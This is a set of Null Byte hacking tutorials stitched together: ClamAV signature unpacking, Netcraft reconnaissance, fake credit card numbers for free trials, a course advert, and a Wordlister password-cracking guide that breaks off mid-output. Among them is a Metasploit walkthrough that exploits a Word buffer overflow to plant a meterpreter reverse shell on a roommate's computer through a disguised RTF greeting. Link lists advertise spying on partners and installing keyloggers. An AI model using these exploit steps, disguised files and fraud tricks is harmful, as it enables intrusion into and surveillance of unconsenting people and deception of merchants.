Just make certain you download the Debian Linux version as Kali is built on Debian.Finally, you can clone it directly from the Git repository at:kali > git clonehttp://git.clamav.net/clamav.devel.gitThis is the method that I would advise you to use here for our purposes, as it installs the developer version of ClamAV.Once ClamAV is downloaded, navigate to it's directory by typing:kali > cd clam-develThen, let's look inside the directory to see what files and directories ClamAV installed.kali > ls -lStep 3: Configure & Make ClamAVIf you cloned the developer version of ClamAV, you will need to configure and make it. To configure ClamAV, use:kali > ./configureTomakeClamAV, use these two commands:kali > makekali > make installBe patient, these steps can take awhile. I also recommend that you runldconfigbefore proceeding any further:kali > ldconfigStep 4: Download the Virus/Malware SignaturesNow that we have ClamAV installed and configured, let's get the virus signatures. ClamAV stores these signatures in compressed files namedmain.cvdanddaily.cvd. The main.cvd is a database of known virus signatures, while the daily.cvd is the "daily" updates to the virus signatures (actually, ClamAV updates signatures 4x per day).You download the main.cvd usingwgetby typing:kali > wgethttp://database.clamav.net/main.cvdAnd then the daily updates of malware signatures at:kali > wgethttp://database.clamav.net/daily.cvdDetection Databases in ClamAVClamAV maintains a number of databases of malware that it uses to compare the files it is examining. These include:MD5 hashes of known malicious binaries (.hdb)MD5 hashes of PE sections (.mdb)Hexadecimal signatures (.ndb)Archive metadata signatures (.zmd or .rmd)Whitelist of known good files (.fp)Step 5: Examine ClamAV SignaturesThe signatures in ClamAV are compressed binary files. If you want to view a virus signature, you must first uncompress the file. To do this, ClamAV comes with a special tool to view its signature files, namedsigtool, which stands for "signature tool," presumably.Navigate to the sigtool directory within ClamAV and type:kali > ./sigtoolThis displays the help file for sigtool. It is this tool that we will be using throughout this exploration of ClamAV. You can see some of the switches for this tool in the screenshot above.Step 6: Unpack the SignaturesThere are two signature files,main.cvdanddaily.cvd. The first being the primary database of signatures, the latter being the daily updates of signatures. Let's unpack them now with sigtool and take a look. We will use the-uswitch forunpack.kali > sigtool -u main.cvdkali > sigtool -u daily.cvdAfter unpacking these signatures, we can see many more files in the ClamAV database directory. These are the uncompressed signatures.Step 7: View the Signature FilesNext, let's take a look at some of the signature files. We can use the Linux commandmoreto display the contents of thedaily.ndbfile. The daily.ndb file is the hexadecimal representation of the signatures. This means that the signature name will be in ASCII, but the signature itself will be in hex.As you can see in the screenshot above, the name of the signature (circled in red) is in ASCII (WIN.Trojan.LoluandWin.Trojan.Vobfus), but the rest of the signature is in hex. In the next tutorial, we will convert that signature to ASCII, then look at the signature language of ClamAV and decipher what the signature is looking for.A Final NoteI do not recommend that you activate or run ClamAV on your Kali system, since nearly everything we use is known malware. ClamAV will identify your tools as malware and try to quarantine them, hence making your Kali a mess. If you have followed my instructions here, ClamAV is not activated and the daemon is not runningβ€”it should not interfere with your hacking platform.Keep coming back, my novice hackers, as we explore the inner workings of AV software!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHack Like a Pro:How Antivirus Software Works & How to Evade It, Pt. 3 (Creating a Malware Signature in ClamAV)Hacking macOS:How to Create an Undetectable PayloadHack Like a Pro:How to Change the Signature of Metasploit Payloads to Evade Antivirus DetectionHow To:Use MSFconsole's Generate Command to Obfuscate Payloads & Evade Antivirus DetectionBest Android Antivirus:Avast vs. AVG vs. Kaspersky vs. McAfeeHack Like a Pro:How to Bypass Antivirus Software by Disguising an Exploit's SignatureHack Like a Pro:How Antivirus Software Works & How to Evade It, Pt. 1Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 1 (Tools & Techniques)How To:Remove the Palladium Pro rogue malware from your computerHow To:Anti-Virus in Kali LinuxHack Like a Pro:How to Evade AV Software with ShellterHow To:Remove Antivirus Pro from your computer with SpyhunterHow To:Remove AntiVirus Pro from your computerHow To:Watch This Sunday's 2013 Pro Bowl Football Game OnlineHack Like a Pro:Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)News:Samsung Preinstalls McAfee Bloatware on Your S8 & It's Neither Great nor FreeHacking Windows 10:How to Break into Somebody's Computer Without a Password (Exploiting the System)Advice from a Real Hacker:How to Know if You've Been HackedHow To:The Definitive Guide to Android MalwareHack Like a Pro:How to Use PowerSploit, Part 1 (Evading Antivirus Software)News:What to Expect from Null Byte in 2015Hack Like a Pro:How to Remotely Install a Keylogger onto Your Girlfriend's ComputerHow To:Android's Built-In Scanner Only Catches 15% of Malicious Appsβ€”Protect Yourself with One of These Better AlternativesHack Like a Pro:How to Read & Write Snort Rules to Evade an NIDS (Network Intrusion Detection System)News:What does Pro Tools HD Native mean for you?How To:Scan for Viruses in Windows Using a Linux Live CD/USBLockdown:The InfoSecurity Guide to Securing Your Computer, Part INews:2,000 FREE Scrabble Apps (iOS) from EA on Facebook & Twitter β€” ENDS TODAY!WTI:The Hangover Pt. 2How To:Keep Stroke Patients Active at Home w/ Wii FitLevitation Challenge:Evading ArrestNews:Oscar Week '11 Predictions with Mike 'The Greek' - Pt. 03The Film Lab:Interview - Jacob Medjuck Pt. 02News:Half a Million Macs Affected by Flashback Trojan! Eradicate It Before It's Too LateWindows Security:Software LevelNews:Oscar Week '11 Predictions with Mike 'The Greek' - Pt. 04News:Oscar Week '11 Predictions with Mike 'The Greek' - Pt. 04News:Oscar Week '11 Predictions with Mike 'The Greek' - Pt. 01News:Oscar Week '11 Predictions with Mike 'The Greek' - Pt. 02News:Oscar Week '11 Predictions with Mike 'The Greek' - Pt. 01
Hack Like a Pro: How to Conduct Passive Reconnaissance of a Potential Target Β« Null Byte :: WonderHowTo
Welcome back, my novice hackers!Most ofmy tutorialsup until this point have addressed how to exploit a target assuming that we already know some basic information about their system. These include their IP address, operating system, open ports, services running, and so on.Several of you have written me asking how to find this information, so for the next few guides here inNull Byte, I'll be covering reconnaissance. In other words, how to get the information needed to hack your target system.Why Passive Recon?Reconnaissance can be divided into at least two categories, active and passive.Active reconnaissancerequires that you interact with the target computer system to gain information about it. Although this can be very useful and accurate, it risks detection. If you're detected doing reconnaissance on a system, the system admin may choose to block your IP address and you'll leave a trail to your subsequent activity.If possible, we would prefer to gather the essential information without ever interacting with the system, thus leaving no trail to trace back to us. That's whatpassive reconnaissanceis.Although there are a number of ways to conduct passive recon, one of the best ways is to use a website likeNetcraft.Step 1: Navigate a Browser to NetcraftLet's open a browser and navigate to theNetcraftwebsite. We should see a webpage that looks like this.Netcraft is a UK company that tracks virtually every website on the planet. From this data, they're able to calculate market share for web servers, uptime, etc., becoming one of the leading authorities for this type of information. They also offer some security services such an anti-phishing extension and phishing alerts.Another service that Netcraft offers is data about nearly every website. This data can be extremely valuable to the hacker. Notice on the right side of the webpage, the area that asks "What's that site running?"We can simply type in a domain name and hit enter.Step 2: Search a DomainAs we can see in the screenshot below, We simply typed in a domain and Netcraft returns results for the domain. Notice that in this case, it returned two sites.Let's click on the report of the second one.Step 3: Open the Site ReportNow we can open the site report and get some critical information about this site. We can see at the top of this report, such information as site rank, primary language, IP address, and nameserver.If we scroll down a bit, we can get some excellent information that would be useful to a potential attacker.We can see under the heading "Hosting History" the netblock owner, IP address(es), operating system, web server, and when the server was last changed. All of this can be useful to the hacker, including the date last changed. This date generally represents the date the system was last rebooted or updated.In the case above, we can see it was last updated Sept. 28, 2007. This would imply that any security OS patches that have been supplied in the interim have NOT been applied to this system. As a hacker, this is juicy information as it tells us that any vulnerabilities to this system that have been found since Sept. 28, 2007 are still available on this system as no vulnerability patches have been applied.Step 4: Site TechnologyWhen we scroll down a bit further, we come to a section titled "Site Technology". Here we get a rundown on the technology the site's running.This listing provides us with information of what technologies the site is running and from here the hacker can seek out vulnerabilities in these named technologies. This is a boon for the hacker as they don't have to guess what technologies are behind the website. As every hack is specific to a technology, knowing what technologies they are running makes it easier for the hacker to find the appropriate hack.It's important to note here that Netcraft data is not foolproof. I would give it an 80-85% probability of being correct, and that's high enough to garner valuable recon info on a website.In my coming coming articles, we will look at additional techniques to scan and do recon on potential targets. Until then, feel free to ask questions on this below, or head theNull Byte forumfor any questions off topic.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCamouflaged soldierandBinoculars soldierphotos via ShutterstockRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:How to Conduct Active Reconnaissance and DOS Attacks with NmapHack Like a Pro:How to Use Maltego to Do Network ReconnaissanceHack Like a Pro:How to Conduct Passive OS Fingerprinting with p0fHack Like a Pro:The Hacker MethodologyHack Like a Pro:How to Perform Stealthy Reconnaissance on a Protected NetworkHow To:Advanced Penetration Testing - Part 1 (Introduction)How To:The Five Phases of HackingHack Like a Pro:How to Hack Web Apps, Part 2 (Website Spidering with WebScarab)Hack Like a Pro:How to Conduct OS Fingerprinting with Xprobe2Hack Like a Pro:Abusing DNS for ReconnaissanceVideo:How to Use Maltego to Research & Mine Data Like an AnalystMac for Hackers:How to Organize Your Tools by Pentest StagesHow To:Probe Websites for Vulnerabilities More Easily with the TIDoS FrameworkHack Like a Pro:How to Conduct Active Reconnaissance on Your Target with hping3Recon:How to Research a Person or Organization Using the Operative FrameworkHack Like a Pro:Using the Nmap Scripting Engine (NSE) for ReconnaissanceHow To:Conduct Recon on a Web Target with Python ToolsHack Like a Pro:Reconnaissance with Recon-Ng, Part 1 (Getting Started)How To:Gathering Sensitive Information: Basics & Fundamentals of DoXingHow To:Change Resolution & Bit Rate in Filmic Pro for High-Quality Video Up to 4K at 100 MbpsNews:AR-Enabled Moon Model Shoots Past Crowdfunding GoalHack Like a Pro:How to Crack Private & Public SNMP Passwords Using OnesixtyoneHow To:Change Your Step Count Goal in Samsung HealthHow To:Tactical Nmap for Beginner Network ReconnaissanceHow To:Earn the 'Passive Aggressive' Achievement in RageHacking Reconnaissance:Finding Vulnerabilities in Your Target Using NmapNews:Police Admit To Drugging Occupy Wall Street Protesters; Suspend ProgramNews:What Hand Do I Read, And Why ?Vaccine bombshell:Baby monkeys develop autism after routine CDC vaccinationsNews:Indie and Mainstream Online Games Shut Down by LulzSecNational Ignition Facility:Big, Giant Lasers of Doom... Or Endless Energy?
How to Get Unlimited Free Trials Using a "Real" Fake Credit Card Number Β« Null Byte :: WonderHowTo
When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to "not get charged." Then I end up forgetting about the trial and want to kick myself in the ass when I see my statement at the end of the month.In order to avoid that rigmarole, you can actually use fake credit numbers instead of your own, and you can do that using the sitegetcreditcardnumbers.com, which can generate up to 9,999 credit card numbers at a time, or just one.Now, to be completely clear,these numbers cannot be used to purchase any item. Nada. Zilch. Nothing. For that to work, you would need a valid expiration date and CVV or CSV number. This site merely provides the standard16 digit credit card numberthat can be used to bypass certain online forms that only ask for the number.How Does It Work?The credit card number generator uses a system based off of theLuhn Algorithm, which has been used to validate numbers for decades. You can learn more about the algorithm on theirwebpage, or check out theNull Byte guide on how credit card algorithms work. A fake number will work for sites that store credit card information to either charge you later or ask you to upgrade.For sites that ask for an upfront fee or have an automatic charge sometime down the line (Hulu Plus, Netflix, Spotify), this won't work since they ask for more than just a credit card number for validation. You can, however, getunlimited free trialson those sites using a simple trick withyour email addressif you have a valid card number withexpiration dateand CSV.Getting a Card Number on AndroidThere's also anAndroidapplication for getting fake card numbers calledCardGen, available for free in the Play Store. You can generate and validate credit card numbers directly from the app, making it easy to use on the go as well. Validation in particular would be useful if you were accepting credit card payments on your own site and wanted to make sure the cards were legit.The app is ad-supported, but since it's free, I can live with that. In the generate field you can select from most of the major credit card providers, including American Express, Mastercard, Visa, and Discover. The disclaimer explains what the app does and how you should use it.What would you do with these credit card number generators? Let us know in the comments section.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCredit cardimage via ShutterstockRelatedNews:The Best Black Friday Deals on Android Phones from Best Buy, Walmart & MoreHow To:Is Your SD Card Legit? Here's How to CheckHow To:Make a Fake IdentityHow To:Get Unlimited Free Trial Subscriptions to Netflix, Spotify, and More Using GmailHow To:Flaw in Hilton's Rewards Program Allows You to Achieve Instant HHonors Gold Status for FreeHow To:Make Realistic-Looking Fake BloodHow To:Get Unlimited Trials of Popular Software (& Bypass Time-Restricted Hotspots for Free WiFi)News:Google Celebrates Chromecast's Birthday with Free All Access MusicHow To:5 Apps That Let You Make Calls Without Giving Out Your Real NumberHow To:Get a Working Phone Number from Almost Anywhere in the WorldHow To:Ditch Your Boring Alarm Sound & Wake Up to a Real Voice on Your Samsung Galaxy S3How To:MagSpoof Digitally Clones the Magnetic Stripe of Any Credit CardHow To:PIN-Protect Photos, Log-in Credentials, Credit Card Info, Notes, & More with KeeplyNews:Comparing the Best International Data Plans from All Major US CarriersHow To:Auto-Fill Credit Card Forms Using Your iPhone's Camera in iOS 8News:8 Tips for Creating Strong, Unbreakable PasswordsHow To:Say "Can I use my credit card here?" in ChineseHow To:Add a Bank Account, Debit Card, or Credit Card to Your PayPalPSA:Don't Cancel Your Apple Arcade Free Trial Until the Last Possible SecondNews:Hackers Have 92% Success Rate Hacking Gmail on AndroidHow To:Disable Apple Music's Auto-Renewal for Free Trials So You Don't Get ChargedHow To:How Credit Card Algorithms Work: The Anatomy of Credit Card NumbersHow To:Get Free Netflix for LifeHow To:Securely & Anonymously Spend Money OnlineNews:1.5 Million Credit Cards Hacked in the Global Payments Breach: Was Yours One of Them?News:Awesome Trick with Prepaid "GoPhones" Nabs You Free Text Messaging for LifeRemove Your Online Identity:The Ultimate Guide to Anonymity and Security on the InternetNews:Fake CakesHow To:Create a Fake Online Identity for Website Registrations in Just One ClickNews:Jackass In 4DNews:What we see is Natural ... But also FakeNews:Public Bathroom FiascoHow To:Mine Bitcoin and Make MoneyHow To:15 Clever Uses for Expired Debit, Credit, Gift, and Membership CardsHow To:get unlimited Respect Points on Drag Racing - iPod/iPhone (EducationalHow To:Bypass a Local Network Proxy for Free InternetNews:Real-Life Angry Birds Game Illegally Staged in Chinese Amusement ParkGreat Deal:Free Facebook Timeline Business CardsNews:FarmVille Free Animal with Facebook Credits Farm Cash PurchaseScrabble Bingo of the Day:PHONEYS
Learn the Essential Skills to Start a Career in IT with This Affordable Online Training Β« Null Byte :: WonderHowTo
If you've tossed around the idea of turning your interest in white hat hacking into a career in cybersecurity or IT, now's as good as time as ever to invest some time and energy into improving your skill set.Companies of all sizes hire IT specialists who can install servers, troubleshoot connections, implement security parameters, and more, and they're paying these professionals handsomely for their services. According to CareerBuilder, IT specialists make an average of$81,000per year, and it only goes up with experience and specializations.Given the popularity of the field, you'll need to have the right certifications and training on your rΓ©sumΓ© if you want to stand out amongst other applicants. Null Byte is an excellent resource for studying up on various skills and improving your craft. Still, a credited certification could be a difference-maker in the eyes of recruiters.CompTIAis considered the gold standard certification provider in the industry and is a great place to focus your attention.CompTIA is self-described as "the world's leading tech organization" and offers 13 certifications and exams. Its entry-level certification, CompTIA A+, will validate that you have foundational IT knowledge that qualifies you for many jobs. In contrast, its broad spectrum of professional certifications helps solidify any specialization you may choose to pursue, such as cybersecurity or IT infrastructure.No matter the path you decide to take, to complement what you've learned on Null Byte already, theComplete 2020 CompTIA Certification Training Bundlewill be a great learning resource as you start your exam prep. With most of the CompTIA certification exams costing over $200 each, you'll want to have all the help you can get before you spend thousands of dollars taking all the necessary exams. And if you have no interest in earning CompTIA certs, the courses in the bundle will at least help you better understand some of the more advanced hacks on Null Byte.The training bundle comes with 14 courses and is currently available for $69 β€” over 95% off its usual price β€” a tiny fraction of what you'd pay for an equivalent in-class education. With 14 courses and over 300 hours of expert-led content, this extensive training package includes coursework for the following certifications: CompTIA A+, Network+, Server+, Linux+, Cloud+, Project+, Security+, CySA+, CASP+, and PenTest+ certifications.CompTIA PathsLike CompTIA A+, Network+ is considered a core certification path for both cybersecurity and IT infrastructure careers. You'll want to start with these core certifications before moving onto more specific specializations.Security+ is required for IT professionals looking to perform core security functions in cybersecurity positions. The PenTest+ exam focuses on your abilities in penetration testing vulnerability management. You'll be expected to not only exploit weaknesses in the network but identify and manage them. If you're interested in diving into more detail on some of the hacks you read about on Null Byte, you'll definitely enjoy these courses.Server+ and Linux+ are more relevant to infrastructure-focused IT professionals and will prepare you to work in infrastructure centers or pursue an in-demand career in cloud computing. But Linux+ could also be of interest if you find some of our Linux-based how-tos daunting, and it would help you out withKali Linux.There's also a course that's dedicated to prepping you for the latest CompTIA CASP+ certification. That exam will show employers that you possess extremely advanced skills in a variety of risk-management scenarios, which will help you and your team navigate a wide range of conventional IT and security problems. Some of those skills include implementing cryptographic techniques, such as blockchain, and the Core Blockchain is a great companion course. Overall, this is a great path if you prefer to remain immersed in the technology rather than managing as your career progresses.On the other hand, if you do prefer management, the Project+ certification will prepare you to apply project management skills in the IT space to manage projects big and small.Each course offers an expansive overview of the specialty you're preparing for, along with more specific elements of how to earn the certification. And there are plenty of real-world examples and practice questions to ensure that there aren't any surprises when it comes time to sit for the real thing.There's a lot to process there, but you'll have lifetime access to all of the courses so you can switch paths as much as you want as your career progresses. Usually priced at over $3,000, this invaluable training is on sale forjust $69β€” over 95% off its usual price. Take advantage of the deal and the opportunity to start a career you're passionate about. (Or at least, to fine-tune your Null Byte skills.)Prices are subject to change.Start Preparing Today:Complete 2020 CompTIA Certification Training Bundle for $69Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viapwstudio/123RFRelatedHow To:Hack Your Business Skills with These Excel CoursesHow To:This Course Bundle Will Teach You How to Start & Grow a BusinessHow To:Take the First Step Towards an In-Demand & Lucrative Career in IT for Under $35How To:Expand Your Coding Skill Set with This 10-Course Training BundleHow To:Make Your Next Career Move with These Online CoursesHow To:Get Project Manager Certifications with Help from Scrum, Agile & PMPHow To:Learn the Ins & Outs, Infrastructure & Vulnerabilities of Amazon's AWS Cloud Computing PlatformHow To:This 5-Course Data Analytics Bundle Is Just $49 TodayHow To:Become an In-Demand IT Pro with This Cisco TrainingHow To:9 DIY Home Remedies for Relieving Itchy Mosquito BitesHow To:Become a Big Data Expert with This 10-Course BundleHow To:Supercharge Your Excel Skills with This Expert-Led BundleHow To:Expand Your Analytical & Payload-Building Skill Set with This In-Depth Excel TrainingHow To:Here's Why You Need to Add Python to Your Hacking & Programming ArsenalHow To:You Can Learn the Data Science Essentials at Home in Just 14 HoursHow To:This $1,300 Ethical Hacking Bundle Is on Sale for $40 TodayHow To:Use a soldering iron when circuit bendingHow To:Draw City LandscapeHow To:Draw Characters in Different PositionsHow To:Draw Different Hand PositionsHow To:Draw a Woman CharacterHow To:Draw a Boat in Two Point PerspectiveNews:Master of Business Administration Online at Kaplan University–Distance LearninNews:The Basics Of Website MarketingNews:Kaplan University's Online Information Technology Degree–University Degrees OnNews:Complete Your Degree as a Nurse Online with Kaplan University's Nurse PractitiNews:Kaplan University Adult Continuing Education Online Business School–Complete YNews:Where Can I Go Out to Eat in LA That Is Awesome?News:Complete Your MBA at Kaplan University–Graduate School OnlineNews:Why go for DIY when you can find an honest florist?EssentialsChat Tutorial:Chat and Color FormattingNews:Kaplan University Graduate Debra Eppley and her Online Nursing DegreeTera Online:Emphasis on GameplayNews:Microsoft Ribbon HeroNews:GEORGE A. ROMERO - Interview (part 2) Discussing his career and his future plaNews:9 Easy Exploits to Raise Combat Skills in SkyrimNews:Another Great Harris Savides InterviewNews:Kaplan University's Visionary Voices–A Collection of Ideas on Continuing EducaNews:Explorers of Light - Crescenzo NotarileNews:Day 2 Of Our New World
Hack Like a Pro: Exploit MS Word to Embed a Listener on Your Roommate's Computer Β« Null Byte :: WonderHowTo
In my last hack blog oncrashing your roommates Win7 system, we started looking at client- side attacks. As promised, we will be looking at some more client-side attacks.As web server and OS's have become hardened and living behind significant perimeter defenses, hackers have migrated to the easiest route to the pot of gold. This is through the often unpatched, unhardened client-side system with little in the way of defenses and a plethora of vulnerable software, including the ubiquitous Microsoft Office products.This hack will work on the Word 2007 or Word 2010. It exploits a buffer overflow in Word to allow us to plant a listener on our target system. I'm assuming that you have the victim's IP address and have verified the Microsoft Office is running (a good assumption, but its better to verify).Step 1: Start MetasploitSo, letfire up Metasploitand find the exploit/windows/fileformat/ms10_087_rtf_pfragments_bof. Now, set Metasploit to use this exploit by typing:msf >use exploit/windows/fileformat/ms10_087_rtf_pfragments_bofStep 2: Set a PayloadThen we need to set a payload. In this case, we wish to use Metasploit's powerful Meterpreter to establish a listener on the victim's system.msf exploit( ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcpStep 3: Show OptionsNow, let's look at our options. As you know from my previous Metasploit blogs, every exploit has options, some mandatory and some not. Let's take a look at the options for this exploit by typingmsf >show optionsStep 4: Change FILENAMEWe can see from the screenshot above that Metasploit has a number of options for this exploit. First, we are creating a .rtf file and Metasploit gives it a default name of FILENAME. Let's change that name to something more inviting to our victim, such as newyearsgreeting.rtfmsf >set FILENAME newyearsgreeting.rtfStep 5: Set Your Local HostNext we need to set the LHOST or the local host. This will be the system we will be listening from--usually our local system--but it could be any system you want to listen from. We simply need to set the LHOST with the IP address of our listening system, in this case 192.168.1.100.msf> set LHOST 192.168.1.100Step 6: Last Check of OptionsBefore we exploit the victim's system, let's check to make sure all our options are set properly.msf> show optionsNote in the screenshot that the FILENAME is now set to newyearsgreeting.rtf and the LHOST is 192.168.1.100.Step 7: ExploitNow, we are ready to exploit. Simply type:msf > exploitYou can see that Metasploit has generated a file called newyearsgreeting.rtf and placed it at /root/.msf4/local/newyearsgreeting.rtf.Step 8: Send the File to the VictimNow we need to send this file to the victim through email or other method. Once the victim opens the file, the Word application will hang or crash leaving us with an active session of Meterpeter on the victim's system. With an active Meterpreter session on the victim's system, we have nearly total control or "own" their system.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHack Like a Pro:How to Embed a Backdoor Connection in an Innocent-Looking PDFHack Like a Pro:How to Remotely Record & Listen to the Microphone on Anyone's ComputerHack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPNews:Top 10 Pranks for the College Freshman DormHack Like a Pro:How to Bypass Antivirus Software by Disguising an Exploit's SignatureHack Like a Pro:How to Hack Windows 7 to See Whether Your Girlfriend Is Cheating or NotHack Like a Pro:How to Exploit IE8 to Get Root Access When People Visit Your WebsiteHow To:Hack Android Using Kali (Remotely)Hack Like a Pro:How to Spy on Anyone, Part 1 (Hacking Computers)Hack Like a Pro:How to Remotely Install an Auto-Reconnecting Persistent Back Door on Someone's PCHack Like a Pro:How to Cover Your Tracks So You Aren't DetectedHack Like a Pro:How to Save the World from Nuclear AnnihilationHow To:Hack Your Kindle Touch to Get It Ready for Homebrew Apps & MoreHacking macOS:How to Create a Fake PDF Trojan with AppleScript, Part 1 (Creating the Stager)Hack Like a Pro:How to Crash Your Roommate's Windows 7 PC with a LinkHow To:Reframe "But" to Share Criticism More KindlyHack Like a Pro:How to Remotely Install a Keylogger onto Your Girlfriend's ComputerHack Like a Pro:How to Spear Phish with the Social Engineering Toolkit (SET) in BackTrackHacking macOS:How to Hack a MacBook with One Ruby CommandHack Like a Pro:How to Remotely Grab a Screenshot of Someone's Compromised ComputerEasily Access MS Tutorials:Microsoft's Desktop PlayerHow To:Embed a Backdoor in an Exe FileNews:The Roommate (2011)News:Anne Hathaway Is a Scrabble FiendWTFoto News Scoop Sundays:Wrath of the Religious RoommateHack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterHow To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop ItHow To:edit your embedded YouTube video in HD or have it Autostart
How to Use Wordlister to Create Custom Password Combinations for Cracking Β« Null Byte :: WonderHowTo
Password crackingis a specialty of some hackers, and it's often thought that raw computing power trumps everything else. That is true in some cases, but sometimes it's more about the wordlist. Making a custom, targeted wordlist can cut down cracking time considerably, and Wordlister can help with that.Wordlister vs Other Wordlist GeneratorsWordlister is a wordlist generator and mangler written inPythonthat can be used to create custom password combinations forcracking. Its main features include multiprocessing for faster speeds and a handful of useful permutation options, including leetspeak, capitalization, and the ability to append and prepend words.Don't Miss:Use Leaked Password Databases to Create Brute-Force WordlistsCrunchis a popular wordlist generator that also creates multiple combinations of passwords, but it relies more on patterns and characters than input files. Also, Crunch requires a flag to be set to limit duplicates, something that Wordlister handles automatically.CeWLis another popular wordlist generator, although it is a different beast altogether. The tool works byspidering webpagesand uses words from there to create custom password lists. CeWL could actually be a useful counterpart to Wordlister; by feeding Wordlister the output of CeWL scraping a webpage, even more targeted password lists could be created.Using Wordlister & All Its OptionsWe will be working onKali Linuxto show off Wordlister, but any otherLinux distroshould suffice.The first thing we need to do is download Wordlister fromGitHub. We can use thewgetutility to retrieve it over HTTP directly from our terminal:~# wget https://raw.githubusercontent.com/4n4nk3/Wordlister/master/wordlister.py --2020-05-03 12:45:36-- https://raw.githubusercontent.com/4n4nk3/Wordlister/master/wordlister.py Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 6195 (6.0K) [text/plain] Saving to: β€˜wordlister.py’ wordlister.py 100%[======================================================================================================================>] 6.05K --.-KB/s in 0s 2020-05-03 12:45:36 (18.5 MB/s) - β€˜wordlister.py’ saved [6195/6195]The script needs Python 3 to work correctly, so if it's not already installed, do so with the following command:~# apt-get install python3Now we can run the script with thepython3command:~# python3 wordlister.py usage: wordlister.py [-h] --input INPUT --perm PERM --min MIN --max MAX [--test TEST] [--cores CORES] [--leet] [--cap] [--up] [--append APPEND] [--prepend PREPEND] wordlister.py: error: the following arguments are required: --input, --perm, --min, --maxThat gives us some usage information and includes which arguments are required. We can append the-hflag to see the help menu, which is a little moreorganizedand informative:~# python3 wordlister.py -h usage: wordlister.py [-h] --input INPUT --perm PERM --min MIN --max MAX [--test TEST] [--cores CORES] [--leet] [--cap] [--up] [--append APPEND] [--prepend PREPEND] A simple wordlist generator and mangler written in python. optional arguments: -h, --help show this help message and exit --test TEST Output first N iterations (single process/core) --cores CORES Manually specify processes/cores pool that you want to use --leet Activate l33t mutagen --cap Activate capitalize mutagen --up Activate uppercase mutagen --append APPEND Append chosen word (append 'word' to all passwords) --prepend PREPEND Append chosen word (prepend 'word' to all passwords) required arguments: --input INPUT Input file name --perm PERM Max number of words to be combined on the same line --min MIN Minimum generated password length --max MAX Maximum generated password lengthTo use Wordlister, we first need an input file containing a list of passwords we wish to create permutations for and mangle.Using your favoritetext editor, create a text file containing a few common passwords (I am only using a small number of passwords here for demonstration purposes because the permutations can get quite large). Here's what mine looks like:~# cat list.txt password hunter2 secret iloveyouNow, we're ready to run the script. Here are the required arguments:input= the name of the text file containing passwordsperm= the number of permutations to be combined on the same linemin= the minimum length of any generated passwordmax= the maximum length of any generated passwordHere is the full command and its output:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 secret password hunter2 iloveyou secretpassword secrethunter2 secretiloveyou passwordsecret passwordhunter2 passwordiloveyou hunter2password hunter2iloveyou iloveyousecret hunter2secret iloveyoupassword iloveyouhunter2We can see that it merely combined the given passwords into all possible permutations.Wordlister contains a handful of useful arguments that are optional, as well. Theleetoption will transform any letters into numbers using leetspeak:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 --leet iloveyou 1l0v3y0u hunter2 hunt3r2 password p455w0rd secret 53cr3t iloveyouhunter2 iloveyoupassword 1l0v3y0uhunt3r2 1l0v3y0up455w0rd iloveyousecret 1l0v3y0u53cr3t hunter2iloveyou hunt3r21l0v3y0u hunter2password hunt3r2p455w0rd passwordiloveyou p455w0rd1l0v3y0u passwordhunter2 p455w0rdhunt3r2 hunter2secret passwordsecret p455w0rd53cr3t secretiloveyou hunt3r253cr3t 53cr3t1l0v3y0u secrethunter2 53cr3thunt3r2 secretpassword 53cr3tp455w0rdThecapoption will capitalize the first letter of each password:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 --cap Iloveyou Secret Hunter2 password iloveyou hunter2 secret Password IloveyouSecret Iloveyouhunter2 Iloveyoupassword IloveyouHunter2 Iloveyousecret IloveyouPassword SecretIloveyou Secretpassword Secretiloveyou SecretHunter2 Secrethunter2 passwordiloveyou passwordHunter2 iloveyouSecret passwordhunter2 iloveyoupassword passwordsecret 